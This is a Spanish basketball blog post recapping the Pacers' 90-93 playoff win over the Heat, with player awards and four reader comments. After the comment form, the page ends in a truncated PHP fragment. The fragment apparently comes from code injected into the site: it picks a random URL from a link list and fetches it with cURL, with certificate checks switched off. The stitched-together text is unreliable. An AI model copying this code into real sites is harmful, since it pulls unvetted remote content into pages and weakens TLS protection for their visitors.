La Crónica: Los Pacers se mantienen con vida

29 de May de 2014 por Simon

Era un partido a vida o muerte para los Pacers. El equipo de Frank Vogel no se podía permitir ni un fallo más sinó quería irse ya de vacaciones eliminados por tercer año consecutivo por los Miami Heat. Tras una primera parte en la que se mascaba la tragedia, una segunda parte brutal de Paul George dabn la vuelta a la tortilla y conseguía alargar un partido más la serie. Además Lebron James completó uno de los peores partido de su carrera cargado de faltas y muy precipitado y errático en los pocos minutos que jugó fruto del desconcierto provocado por tener que contemplar gran parte del partido desde el banquillo.

Los locales saltaron a la cancha con la clara intención y determinación de llevarse el duelo y desde el primer minuto trataron de llevar el peso del partido y jugar como les convenía. Esa actitud les permitió coger las primeras ventajas. Lebron James empezó a sufrir problemas de faltas en el primer cuarto que se agravaron en el segundo tras cometer la tercera nada más regresar a cancha. A pesar de tener que proteger a Lebron sentándolo en el banquillo, los Heat se fueron al descanso con 9 puntos de ventaja gracias a una buena racha de Wade y el acierto de Allen y Lewis desde el perímetro. Poco cambió el partido en la reanudación del juego, Rashard Lewis continuaba sosteniendo a los Heat a base de triples mientras que James seguía peleado con la diosa fortuna y cometía dos faltas más en los primeros tres minutos de tercer cuarto que le obligaban a retirarse de nuevo. Pero poco a poco los Heat se fueron atascando hasta que llegó el colapso definitivo que dio la vuelta al marcador. Se pasaron prácticamente 4 minutos sin anotar a mediados del tercer cuarto, minutos en los que los jugadores de Indiana se mostraron realmente certeros con un Paul George al que se le empezaba a calentar la muñeca. Sin embargo, los Heat no habían dicho su última palabra y el regreso de Lebron, a pesar de que se le veía muy perdido en la cancha, les espoleó para continuar peleando el encuentro gracias al acierto desde la línea de 3 puntos. Sin embargo, Paul George con 21 puntos en el cuarto definitivo no permitió que los Heat se llegaran a poner por delante en ningún momento. Rashard Lewis, con dos triples seguidos, llegó a poner a los suyos a 1 sólo punto a falta de 16 segundos y Chris Bosh aún tuvo un tiro para poner a Miami por delante pero finalmente los Pacers pudieron celebrar la sufrida victoria (90-93).

A pesar de la victoria mal sabor de boca se les queda a los Pacers ya que necesitaron de un Paul George tocado por la varita para conseguir derrotar a unos Heat que jugaron prácticamente sin Lebron James. 

PREMIOS

MVP: Todos y cada uno de los 37 puntos que anotó Paul George fueron necesarios para llevarse el partido, sobretodo los 31 que anotó en la 2ª mitad. Además, estuvo muy inspirado también al otro lado de la cancha en el que volvió loco a Lebron James y robó 6 balones.

Sorpresa: En anteriores partidos habíamos destacado a Rashard Lewis por su defensa pero ayer, en ausencia de Lebron, tomó protagonismo en ataque y acabó el partido con 18 puntos merced a su 6 de 9 en triples.

Decepción: Tenemos que remontarnos al mes de diciembre de 2004 para encontrar el último partido en el que Lebron James (7p – 4r) se quedó en 7 puntos o menos. Ha llovido desde entonces.

Esfuerzo en vano: En ausencia de Lebron, fueron las otras 2 patas del Big Three las que cogieron el mando. Dwyane Wade acabó con 18 puntos, 7 asistencias y 8 rebotes y Chris Bosh con 20 puntos y 10 rebotes.

Imágenes | AP Photos / Getty Images

 

Comenta

4 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Pues partidazo del señor George al que se le echaba de menos en la serie teniendo en cuenta el duelo que el año pasado tuvo con LeBron.Nada que alegar,en un horrible partido de James,Miami aún pudo ganar gracias a la suma en este partido de R.Lewis,que triple por aquí,triple por allá,hizo pupa a la defensa de Indiana,la cual estuvo muchas veces con una caraja de aupa.Lo mejor habiendo perdido que Ray Allen está OK,así que a finiquitar la serie en Miami con las ganas de sangre que debe estar acumulando LeBron por este mal partido suyo.

      Citar

  2. GreenPride dice:
    #2

    Pues enorme partido de Paul George tanto en ataque como en defensa, horrible de LeBron y victoria agónica de Indiana en su cancha y jugandose la eliminación… eso queda para felicitar a los Pacers por el esfuerzo realizado y prepararse para su más que probable eliminación en el 6º encuentro. Pero eso será mañana.
    Hoy los Pacers respiran gracias a una colosal actuación de su estrella, que como todo el equipo ha vivido en el carrusel de altos y bajos toda la segunda parte de la temporada y de los Playoffs. Con West y Hibbert más productivos pero sin ser realmente dominadores tuvo que ser George el que tirara de su equipo hasta llevarle a la victoria asumiendo y anotando los tiros decisivos del día. Aún sin LeBron los Heat se las apañaron para mantenerse vivos gracias al mal ataque de los Pacers y a la producción de Wade&Bosh ayudados y de qué manera por un renacido Rashard Lewis desde la línea de tres. Esta vez el triple abierto de Bosh en la esquina en la ultima jugada que hubiera dado el partido a Miami no entró y esto da algo de vida a los Pacers.
    Sin embargo, una vez alargada la serie parece difícil que puedan sobrevivir al 6º en Florida. Necesitarían que George haga otro gran partido y sobre todo que sus interiores dominen de una vez por todas la zona para tener opciones. Además un LeBron cabreado por su horrible partido querrá finiquitar las series y plantarse ya en las finales.
    Y esta noche partidazo que puede ser decisivo entre Thunder y Spurs…. Después de dos palizas por bando en su casa hoy los dos saben que el partido es decisivo por lo que yo espero el primer partido igualado de la serie. El que lo gane dará un paso enorme para acceder a las Finales. Veremos pero seguro que esta vez ni unos ni otros se dejan ir cuando vean diferencia en contra… Partidazo nos espera

      Citar

  3. Esteban dice:
    #3

    siempre se dijo que la NBA recien empieza en los PO y vaya si es cierto, es terrible lo que buenos jugadores de la temproada regular, les cuesta jugar en una instancia tan decisiva como esta

    Watson, Scola, Turner, Beasley, son jugadores que hacen sus puntos y tienen buenos promedios en la temporada regular, pero en esta serie, ver una canasta de cualquier de ellos es para festejar

    por eso, creo sin dudas que la clave de la serie, ha pasado mas alla de lol que las figuras acostumbran a dar por un solo jugador de rol secundario pero con alma de estrella como Ray Allen, sin tener numeros de estrellas, esa escopeta automatica que tiene de 3 y para anoptar en momentos complicados esta siendo la diferencia entre ambos equipos

    los pacers no tienen un jugador fuera de sus figuras capaz de aportar algo de ofensiva o amenaza al menos como lo es Ray

    creo que me tocara hacer el analisis de fin de curso de los pacers, y alli me referire a su banca, la cual estimaba mejorada, pero no, un año mas, vuelven a ser los 5 pacers frente al batallon del Heat

      Citar

  4. Lucho dice:
    #4

    Cuantos hubieran pensado que el Juego 5 lo iba a ganar San Antonio por 30 puntos?
    Yo desde luego no

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>